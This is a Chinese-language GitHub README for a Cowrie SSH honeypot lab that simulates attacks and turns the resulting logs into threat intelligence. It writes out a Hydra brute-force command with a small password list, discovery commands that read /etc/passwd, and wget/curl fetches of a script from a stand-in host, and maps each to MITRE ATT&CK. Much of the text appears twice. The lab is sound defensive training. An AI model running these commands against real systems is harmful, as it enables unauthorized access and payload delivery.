TokeATJ/Cyber-Deception-Threat-Intelligence-Lab
GitHub: TokeATJ/Cyber-Deception-Threat-Intelligence-Lab
基于 Cowrie 蜜罐的威胁情报实验项目,通过模拟攻击链路捕获并分析攻击者行为,生成可操作的安全遥测数据。
Stars: 0 | Forks: 0
# 网络欺骗威胁情报实验室
Cowrie 蜜罐攻击模拟
# Hydra 暴力破解攻击检测
## 目标
验证 Cowrie SSH 蜜罐检测、捕获并记录来自攻击者控制系统的自动化密码猜测攻击的能力。
## 背景
暴力破解攻击仍然是攻击者用于获取面向互联网服务未授权访问的最常用技术之一。攻击者通常不会手动尝试凭证,而是经常利用 Hydra 等自动化工具,针对 SSH 服务快速测试大量的用户名和密码。为了模拟这种行为,在 Kali Linux 攻击机上创建了一个自定义密码字典,并用于对 Cowrie SSH 蜜罐发起自动化凭证攻击。
## 创建密码字典
在 Kali Linux 攻击工作站上使用 Nano 创建了一个自定义密码列表。
### 密码列表
```
admin
password123
welcome
qwerty
loveyou
```
### 截图
## 攻击模拟
以下 Hydra 命令从 Kali Linux 执行:
```
hydra -l root -P password.txt 10.0.2.5 -s 2222 ssh
```
### 命令分解
| 参数 | 用途 |
|------------|-----------|
| `-l root` | 目标用户名 |
| `-P password.txt` | 密码字典 |
| `10.0.2.5` | Cowrie 蜜罐 IP |
| `-s 2222` | Cowrie SSH 端口 |
| `ssh` | 目标服务 |
## 预期攻击行为
Hydra 系统性地针对目标 SSH 服务尝试提供的密码字典中的每个密码。
测试的凭证组合:
```
root/admin
root/password123
root/welcome
root/qwerty
root/loveyou
```
## 证据收集
在执行期间,使用以下命令监控了 Cowrie 日志:
```
tail -f ~/cowrie/var/log/cowrie/cowrie.log
```
**Hydra 成功识别了多个被接受的凭证,Cowrie 记录了成功的认证事件并生成了攻击者遥测数据。**
蜜罐记录了:
- 失败的登录尝试
- 用户名定位活动
- 密码猜测行为
- 源 IP 地址信息
- 认证结果
**在 Kali Linux 中确认找到了密码**
**在蜜罐中确认带有密码的登录尝试**
grep "login attempt" ~/cowrie/var/log/cowrie/cowrie.log
**生成了哪些遥测数据?**
```
Authentication Events
Username Attempts
Password Attempts
Source IP Information
Session Data
```
## MITRE ATT&CK 映射
### 凭证访问
T1110.001 - 密码猜测
## 安全意义
此用例演示了防御者如何在真实系统遭到破坏之前,利用蜜罐遥测数据识别凭证访问活动。Cowrie 被配置为接受常见密码并迅速移交 shell。
通过有意暴露受监控的 SSH 服务,Cowrie 提供了对以下内容的可见性:
- 常见的攻击者密码
- 被定位的用户名
- 暴力破解模式
- 源 IP 地址
- 认证行为
这些情报可用于改进检测、丰富威胁狩猎调查,并增强防御监控。
# 用例 6:入侵后探测
## 目标
捕获攻击者获得 shell 访问权限后的侦察活动。
**成功创建了 ssh 会话**
```
ssh root@10.0.2.5 -p 2222
```
随机密码被发送到了 cowrie 日志
## 攻击模拟
```
whoami
pwd
uname -a
id
ls
cat /etc/passwd
```
## MITRE ATT&CK
- T1082 – 系统信息发现
- T1083 – 文件和目录发现
## 收集的证据
- 执行的命令
- 会话活动
- 探测行为
## 结果
✅ 探测活动已捕获
✅ 攻击者行为已记录
# 用例 7:文件下载与工具传输
## 目标
捕获恶意软件投递和工具传输尝试。
## 攻击模拟
```
wget http://example.com/test.sh
```
或
```
curl http://example.com/test.sh
```
## MITRE ATT&CK
- T1105 – 入口工具传输
## 收集的证据
- 下载尝试
- 文件传输活动
- 命令执行遥测数据
## 结果
✅ 工具传输活动已记录
✅ 命令遥测数据已收集
# 用例 8:威胁情报收集
## 目标
将攻击者活动汇总为可操作的威胁情报。
## 收集的情报
- 源 IP 地址
- 用户名
- 密码尝试
- 成功登录
- 失败登录
- 执行的命令
- 会话活动
- 文件下载尝试
## 结果
✅ 威胁情报已生成
✅ 敌对行为已记录
# 用例 9:Splunk 威胁情报仪表板
## 目标
使用 Splunk 实时可视化攻击者活动。
## 仪表板组件
- 认证活动
- 热门用户名
- 热门密码
- 源 IP 地址
- 执行的命令
- 文件下载尝试
- 事件量趋势
## 结果
✅ 实时威胁情报仪表板已创建
✅ 实现了实时攻击可见性
# 用例 10:MITRE ATT&CK 关联
## 目标
将 Cowrie 蜜罐活动映射到 MITRE ATT&CK 技术。
| 活动 | ATT&CK 技术 |
|-----------|-----------|
| Nmap 扫描 | T1595 – 主动扫描 |
| Hydra 攻击 | T1110 – 暴力破解 |
| 成功登录 | T1078 – 有效账户 |
| 探测命令 | T1082 – 系统信息发现 |
| 文件下载尝试 | T1105 – 入口工具传输 |
## 结果
✅ ATT&CK 映射已完成
✅ 敌对行为已分类
✅ 检测工程机会已识别
# 最终结果
- 使用 Cowrie SSH 蜜罐捕获了攻击者活动
- 使用 Kali Linux 模拟了敌对行为
- 使用 Nmap 检测了侦察活动
- 使用 Hydra 检测了凭证攻击
- 捕获了成功的认证事件
- 记录了入侵后的探测活动
- 记录了工具传输尝试
- 生成了可操作的威胁情报
- 在 Splunk 中可视化了攻击遥测数据
- 将活动关联到 MITRE ATT&CK 技术
## 关键要点
通过有意接受攻击者的交互并记录其每一个操作,Cowrie 为防御者提供了宝贵的遥测数据,这些数据可用于威胁狩猎、威胁情报、检测工程和对手模拟演练。
## 攻击模拟
以下 Hydra 命令从 Kali Linux 执行:
```
hydra -l root -P password.txt 10.0.2.5 -s 2222 ssh
```
### 命令分解
| 参数 | 用途 |
|------------|-----------|
| `-l root` | 目标用户名 |
| `-P password.txt` | 密码字典 |
| `10.0.2.5` | Cowrie 蜜罐 IP |
| `-s 2222` | Cowrie SSH 端口 |
| `ssh` | 目标服务 |
## 预期攻击行为
Hydra 系统性地针对目标 SSH 服务尝试提供的密码字典中的每个密码。
测试的凭证组合:
```
root/admin
root/password123
root/welcome
root/qwerty
root/loveyou
```
## 证据收集
在执行期间,使用以下命令监控了 Cowrie 日志:
```
tail -f ~/cowrie/var/log/cowrie/cowrie.log
```
**Hydra 成功识别了多个被接受的凭证,Cowrie 记录了成功的认证事件并生成了攻击者遥测数据。**
蜜罐记录了:
- 失败的登录尝试
- 用户名定位活动
- 密码猜测行为
- 源 IP 地址信息
- 认证结果
**在 Kali Linux 中确认找到了密码**
**在蜜罐中确认带有密码的登录尝试**
grep "login attempt" ~/cowrie/var/log/cowrie/cowrie.log
**生成了哪些遥测数据?**
```
Authentication Events
Username Attempts
Password Attempts
Source IP Information
Session Data
```
## MITRE ATT&CK 映射
### 凭证访问
T1110.001 - 密码猜测
## 安全意义
此用例演示了防御者如何在真实系统遭到破坏之前,利用蜜罐遥测数据识别凭证访问活动。Cowrie 被配置为接受常见密码并迅速移交 shell。
通过有意暴露受监控的 SSH 服务,Cowrie 提供了对以下内容的可见性:
- 常见的攻击者密码
- 被定位的用户名
- 暴力破解模式
- 源 IP 地址
- 认证行为
这些情报可用于改进检测、丰富威胁狩猎调查,并增强防御监控。
# 用例 6:入侵后探测
## 目标
捕获攻击者获得 shell 访问权限后的侦察活动。
**成功创建了 ssh 会话**
```
ssh root@10.0.2.5 -p 2222
```
随机密码被发送到了 cowrie 日志
## 攻击模拟
```
whoami
pwd
uname -a
id
ls
cat /etc/passwd
```
## MITRE ATT&CK
- T1082 – 系统信息发现
- T1083 – 文件和目录发现
## 收集的证据
- 执行的命令
- 会话活动
- 探测行为
## 结果
✅ 探测活动已捕获
✅ 攻击者行为已记录
# 用例 7:文件下载与工具传输
## 目标
捕获恶意软件投递和工具传输尝试。
## 攻击模拟
```
wget http://example.com/test.sh
```
或
```
curl http://example.com/test.sh
```
## MITRE ATT&CK
- T1105 – 入口工具传输
## 收集的证据
- 下载尝试
- 文件传输活动
- 命令执行遥测数据
## 结果
✅ 工具传输活动已记录
✅ 命令遥测数据已收集
# 用例 8:威胁情报收集
## 目标
将攻击者活动汇总为可操作的威胁情报。
## 收集的情报
- 源 IP 地址
- 用户名
- 密码尝试
- 成功登录
- 失败登录
- 执行的命令
- 会话活动
- 文件下载尝试
## 结果
✅ 威胁情报已生成
✅ 敌对行为已记录
# 用例 9:Splunk 威胁情报仪表板
## 目标
使用 Splunk 实时可视化攻击者活动。
## 仪表板组件
- 认证活动
- 热门用户名
- 热门密码
- 源 IP 地址
- 执行的命令
- 文件下载尝试
- 事件量趋势
## 结果
✅ 实时威胁情报仪表板已创建
✅ 实现了实时攻击可见性
# 用例 10:MITRE ATT&CK 关联
## 目标
将 Cowrie 蜜罐活动映射到 MITRE ATT&CK 技术。
| 活动 | ATT&CK 技术 |
|-----------|-----------|
| Nmap 扫描 | T1595 – 主动扫描 |
| Hydra 攻击 | T1110 – 暴力破解 |
| 成功登录 | T1078 – 有效账户 |
| 探测命令 | T1082 – 系统信息发现 |
| 文件下载尝试 | T1105 – 入口工具传输 |
## 结果
✅ ATT&CK 映射已完成
✅ 敌对行为已分类
✅ 检测工程机会已识别
# 最终结果
- 使用 Cowrie SSH 蜜罐捕获了攻击者活动
- 使用 Kali Linux 模拟了敌对行为
- 使用 Nmap 检测了侦察活动
- 使用 Hydra 检测了凭证攻击
- 捕获了成功的认证事件
- 记录了入侵后的探测活动
- 记录了工具传输尝试
- 生成了可操作的威胁情报
- 在 Splunk 中可视化了攻击遥测数据
- 将活动关联到 MITRE ATT&CK 技术
## 关键要点
通过有意接受攻击者的交互并记录其每一个操作,Cowrie 为防御者提供了宝贵的遥测数据,这些数据可用于威胁狩猎、威胁情报、检测工程和对手模拟演练。标签:CTI, PFX证书, PoC, SSH, 威胁情报, 开发者工具, 攻击检测, 暴力破解, 红队行动, 蜜罐, 证书利用